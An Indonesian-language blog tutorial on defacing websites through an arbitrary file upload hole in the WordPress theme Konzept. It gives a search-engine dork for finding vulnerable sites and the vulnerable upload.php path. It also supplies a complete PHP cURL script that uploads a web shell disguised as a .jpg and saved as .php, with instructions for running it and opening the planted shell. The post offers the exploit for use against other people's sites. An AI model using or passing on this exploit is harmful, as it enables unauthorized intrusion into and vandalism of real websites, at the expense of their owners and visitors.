Kali ini gua mau share Cara Deface Menggunakan WordPress Theme Konzept Arbitrary File Upload Vulnerability
Dork :
inurl:/wp-content/themes/konzept/
1. Dorking di search Engine
exploit:
/wp-content/themes/konzept/includes/uploadify/upload.php
3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Kurang lebihnya sih gituh :v
4. Buat File Baru Berekstensi .php Contoh konzept.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn konzept.php tadi*btw disini shell ente, ubah dulu ekstensinya jadi .JPG
<?php
$url = "http://127.0.0.1"; // put URL Here
$post = array
(
"file" => "@namashell.jpg",
"name" => "namashell.php"
);
$ch = curl_init ("www.target.co.li/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.
8. Shell Akses: www.target.coli/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
Semoga Bermanfaat
Sumber : TKJ Cyber Art
0 Response to "Deface Menggunakan WordPress Theme Konzept Arbitrary File Upload Vulnerability"
Post a Comment